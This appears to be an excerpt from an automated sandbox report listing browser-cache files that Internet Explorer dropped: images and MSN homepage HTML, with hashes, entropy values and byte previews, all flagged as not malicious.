                                                SSDEEP:768:ITUs9uf7dj9BrZJEhs9zMVbj7xUp+6rqaxiatR8MiCqeB:Izuf7fhPE2zMVbh2rqaJnLiCLB
                                                MD5:AD584D72D7932711DB1D30832190E067
                                                SHA1:290EC377BC938991D3BDA888D74666EAD6CBB18A
                                                SHA-256:848B429A0185010DD921D927A29D5DFE2ED332D379E008CE465FA6508EB35948
                                                SHA-512:DB034AB85381270E3AFFBAD3B15FB94A9C1E894F2E1A84B13A0FB4D6D66FFDE158B70377068668BD721CA500D6AAB3788CEE6C830A7AFC8C48044A01E6AC2DEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z`-...P.(.h.......A..J.3@.Z..4.....P........r.n..j.5...}@.9....q@.@..Asp..$.Uj.q..15F....k.`...$..(..]?^.6X...a...<D&$..GZ....z.......x..,&.E.X7.:.p)^#.%......ac.{.V#<..].$....4.o.\....Q,.........zCM.-..2m1..x:MZ..$..&].#*...........<...4<..c>.E..>e....s..T..YjV..J...2q.YC.R....r....@pEw....f.X.#u.a]...-...+7..4....V.-0.@%0..C.sHc.h.E...1..&h.h.....@.@.a.I..:pk9#H.".>O...l..^H.J...`
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgIQG[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):4394
                                                Entropy (8bit):7.030110019355473
                                                Encrypted:false
                                                SSDEEP:48:Qf5uETAGK88888Z1sHvq2WNK0NVuwmS9CapNiWWWWd:QfQE9GHz0/mSTpNiWWWWd
                                                MD5:16BDA1AE195B38579F194CD823D801F8
                                                SHA1:A216736D1818913D2856B46D4FFB45661105AC34
                                                SHA-256:5923487B64BB2CE31EE68CAC5C68C4FF3992EC21AC7135CA9C84293E3FD711BC
                                                SHA-512:6C95E99091B76DE8994405AB13BE73427534B83A858FA6B9929419858935B30BBC1686BB60094FA82585646B07497FF83F5777F13CBC5F3D0B0E7DE68382415E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(......(......(......(......(......(......(......(......(......(....<...}k..O...Y.3....0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgJ6C[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):9430
                                                Entropy (8bit):7.764531777068338
                                                Encrypted:false
                                                SSDEEP:192:Q2sGHXqF6UeKGo3/VvhzFYjSpwT5B9sYDlCLBoSvRqg5ej4zKiAUH0Y8:NsG3qHP5/VvZFYjVsYDluAg5ej4zJAew
                                                MD5:DA3EF5D61CFCF919A9B3C8244CF1A338
                                                SHA1:6D13CC7968F716BC4A4B44DA6B48D5C5156A2A82
                                                SHA-256:26783E83884E406E82D42417274A97129D68F717B29B64D844397BDDF412634C
                                                SHA-512:BF62219E2BD0B0D261594B1E9597E30C695B661AE3BC59F62CB4770FE0F9D3539063B23C4B9B357FF33C360AEDCAA2A13C228046BD5BBE66D2A591E3EA511C72
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..@%...-.-.........(.h.R..1(......."....&..c).%.:..R..@.f..&sL..Ha...P ...E..P......0..4.Fi.9i.u.4.bc).!.a@...Z.(...%.................p4.qwR..&...d.@.(....!......zT....F.i.Q@!i.CL.P!M.#c.11....H...7Z.X..m...x..................@.Ha@.(.....3@..%...%..).}.....s@.GJL...H...D.().Ha..9W..F.&B...E0%QHb...dg.R a...a..8P.....P.@.@...LP0...0......J.(.........c....Hb.4...q7Q`.......c....Hd.qHc...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgK4d[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                Category:dropped
                                                Size (bytes):20376
                                                Entropy (8bit):7.962400515640925
                                                Encrypted:false
                                                SSDEEP:384:+/xilUCs8A4tac82MflSOxNLK2DuogkTNoF7+N4LmI4sRPHdbYoYVdVyKfuGMtFs:+/wlUGAQac82M9SALKsuqNot+SLi6Vbq
                                                MD5:4BDC3742A1EC0F279563374E588C0AE6
                                                SHA1:A7AA170E4D461B5F5360C476939FD9E8E7C9F061
                                                SHA-256:F45A693B9FE42DCE555396A230A3D4996304A500C58AB2F95F3FC45DD1C6E552
                                                SHA-512:741DDF5E2C2D2E2CB2EA2E790DC48F58FE40ACAD4AFBFDC7433F2D97532DB8A448630E2665CE3FA5D2C66DAF0ED8E44D0D0E30DDC8D28766A5CAC6260930BA0D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.tv...&....y.7..S.R.u/qw.. ..:1..Q.."..U.%..x.G..}..+8.&...n........S..*L..=...'@=.IS..).......TC...........gVNVF..[N..nb....s..e=...W.~Y.0C.K....Y.<.CI......t"..... ..u......u...Q..4q.|...R...2}....a....1.y.P|........0..........s,. ....5).C...M.h...q.9.^..<..%Y\..[.h.c3..p.0.n0j..V..I.].5....)RT....q.(.t.|..9.<. .6.J.B........#*..q.U....6.M}1Y.s........U".....g..$.O,0O5.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgK4d[2].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):25654
                                                Entropy (8bit):7.962278587448777
                                                Encrypted:false
                                                SSDEEP:768:NQ1iy7DdjBD1GRVu3k5D6bouOMK1lUPN7hSzxW9Op2:NQ1i4RmX2MuOtoN7UzxWI2
                                                MD5:2D55FE852EF6D4104BC138843CEB951A
                                                SHA1:8C51A29E9D667D7CD18BEA006B3F5D98C44D9B09
                                                SHA-256:1F0BCA78B6B16616CD192F6A017343B89774A71178C4861CDE2746E5885720B7
                                                SHA-512:0746C0376F76EE572CBFC8076CCE99554D8F71B68ED339E95A06937622A3837579FC090B78E1651E957E9B93AF9B1DCF357FCA50F6FEC05C09143E4045505001
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........tz<.?...(.X....V.zj..u-....y.F.;...>....TQ..T.G.@mE.E..>Rq..))3..QZ...E.Z].,.d...iE6.....Jyc...|...2..R..R.v..4.l.o.M..._...qlt...Mh...$....Fj9KR}.K{.0...n..{...'a9j2BB....c(.Z.Ucsq........Z[...l.$V*&.EK..kq..).x..Q...$qv*f..#.,6..=..w..Wv..?...` p.oJ.q.KD..;.ek.e...R6$(..?.u.8.3J.M...;h.....=..R..qu,.....g.h.."T..Q+F..$.py..PM...F/..1l+*...w.>.5b..U..K.)a#+6G+
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgkHA[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):8589
                                                Entropy (8bit):7.917883695837637
                                                Encrypted:false
                                                SSDEEP:192:Qo6znNwgr1T/regmhcvAa31b1TMu2UQa9uQEEa1Wkfq1:b6znNvRzycvj1TMurxET1bfq1
                                                MD5:464362B49496E353AABF75DA5015B426
                                                SHA1:51C5A1291B3B5746BB5602CD19F68ABA7FFCC838
                                                SHA-256:3F86873DB8AF0970856EE5493C1712D11444B75DA21B3F90E27495BA0AA4B943
                                                SHA-512:D51C63F9D6296FF7035B1D5AFA7973E22250B5A36CB56834F09045ABF87950B4F5F94763578D833B27626AA3981CE0C679C6730AE10CC248CD723E8F5645E2C1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...Y.&h.....@.M1..`..AH....V..qd.b....J7Bn.....F.[..G,{..m.....S.7..xy..j]^~...z.\.U2w.*4...>y...G....#.}+M..<.+...G..............-.......v.....o..B.,......q..n..f.bkV.cT#..[...lJw.....D.;q.S..(.....!..c...v.\....q\].h.\.n....8...ihk....F....x.y...=.z.m.H.2M(......C$8..y5zc.R.....@.4..`..f..I..O.3E.l.i..p#.T.......>a..X.2[7.b.A..4..E.]3g.Z2......0...q....._....WX.E.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAzb5EX[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):322
                                                Entropy (8bit):6.966129933463651
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
                                                MD5:89E1141C659F2127DD80809F71326697
                                                SHA1:3262110C91000071FDBB0D33893EC1EC8026ADEC
                                                SHA-256:98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
                                                SHA-512:1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..=..@..C.....K..`-(.`...vb......vV...`g.!D.....!.....7..../Qg.Z...Y........c....t.......c..)..............)@.:.....8..t1{P_\.1..3Ao......A].....5G_.....\5..x5R.....'...VS......|.`...~........+....H^..1E^...0.,')....qJ8!..D.!O}.i1..E(....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB10MkbM[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):936
                                                Entropy (8bit):7.711185429072882
                                                Encrypted:false
                                                SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                                MD5:19B9391F3CA20AA5671834C668105A22
                                                SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                                SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                                SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......|.7....r.x..S.?.ws....B9.P.-Yt*..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.C*WB..F...b../.H..\..*.).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@...*..A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu.*.A)...-.w.*.1/+.)....XR.A#;..X...p..3!...H.....f.ok;..|x..1.R.\W.H\...<..<&.M!mk:|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cEP3G[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1088
                                                Entropy (8bit):7.81915680849984
                                                Encrypted:false
                                                SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;*J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x*..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7gRE[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):501
                                                Entropy (8bit):7.3374462687222906
                                                Encrypted:false
                                                SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                MD5:1FCA95AEED29D3219D0A53A78A041312
                                                SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...|.~.0hv..S..7.....YBn..B..o.T<.........|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBY7ARN[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):779
                                                Entropy (8bit):7.670456272038463
                                                Encrypted:false
                                                SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                MD5:30801A14BDC1842F543DA129067EA9D8
                                                SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi..*.E..h.A...6..0.Z$..i.A...B....H0*.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U*.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!W*u*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.|Or.L._...;a..Y.]i.._J....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\a8a064[2].gif
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:GIF image data, version 89a, 28 x 28
                                                Category:dropped
                                                Size (bytes):16360
                                                Entropy (8bit):7.019403238999426
                                                Encrypted:false
                                                SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\auction[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):18959
                                                Entropy (8bit):5.781315138449176
                                                Encrypted:false
                                                SSDEEP:384:9Yl/pQJWBn6pKNzAWmAm4BsbF/y/ARMhmZdyLr0j5U8y8X7vL:9YhXNxmDJstUW8lY8Lj
                                                MD5:3CF1EE8A2983412446003A598A5BE743
                                                SHA1:FB44CA22BC0F01C69D6558EC95720A489CD01A3B
                                                SHA-256:0E6D6F2EBC5E97462CEA092F953A4C75325B1B5703B87C0331B8618C96EAA27B
                                                SHA-512:198316F6FE087FD05EFD4427C7261BC91CE7BA0CBA81A1911AD9260D44E7699BB87F6679A215903BA833F4846032FBDA04EBA9B7B5DAF2CEF078B3F6CA94EB7F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_ac8f95f3e193b6cd50a90b5342db36c8_c897ceee-bab8-45a0-9c84-6f772cce7bfd-tuct834aab7_1631266103_1631266103_CIi3jgYQr4c_GKPb2-n--Jqv2QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;},&quot;tbsessionid&quot;:&quot;v2_ac8f95f3e193b6cd50a90b5342db36c8_c897ceee-bab8-45a0-9c84-6f772cce7bfd-tuct834aab7_1631266103_1631266103_CIi3jgYQr4c_GKPb2-n--Jqv2QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;,&quot;pageViewId&quot;:&quot;7e44c6b953a846ec90f1f51090b5a28e&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="9" data-viewab
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\cfdbd9[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):740
                                                Entropy (8bit):7.552939906140702
                                                Encrypted:false
                                                SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                MD5:FE5E6684967766FF6A8AC57500502910
                                                SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):422276
                                                Entropy (8bit):5.440261079746276
                                                Encrypted:false
                                                SSDEEP:3072:FJQJUHxx+/AkJ8cZnC00vJcemu87IwG8SLLViu2SdnBMlqXXpLV:FJQOO/17RG8ks9lqXX3
                                                MD5:5C1DECE6AA6CEF2180E5BE051CE737D5
                                                SHA1:D47A7B69047601CFD9147C1DEE7DAD0AA61E49A9
                                                SHA-256:08F9EE394FB18E2E65F4E79F80AF5B0A82773C35045A8C9C5C256A94299A6A4D
                                                SHA-512:8341144126BF9CE2A1E9E460D00240CF4D5123084CF42463F36824D75D0CF3C049E1E430C3511B748279BD9F98760B05E8B7BB540D65F1DD582DC7C0D05BFC59
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:7e44c6b9-53a8-46ec-90f1-f51090b5a28e;cn:4;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 4, sn: neurope-prod-hp, dt: 2021-09-02T17:28:02.6824904Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:26:56Z;axd:;f:msnallexpusers,muidflt49cf,muidflt259cf,muidflt300cf,mmxandroid1cf,complianceedge1cf,moneyhp2cf,audexhz3cf,gallery1cf,gallery3cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msn,weather3cf,prg-1sw-cont,prg-1sw-hmtp,msnsapphire1cf,msnsapphire2cf,prg-adspeek,prg-clk-trftms,btrecrow1,1s-winauthservice,prg-wpo-hpolypc,weather7cf,prg-1sw-flyt-htpc,prg-1sw-halfwea,prg-1sw-ownformat,prg-brandupwhp;userOptOut:false;userOptO
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):748
                                                Entropy (8bit):7.249606135668305
                                                Encrypted:false
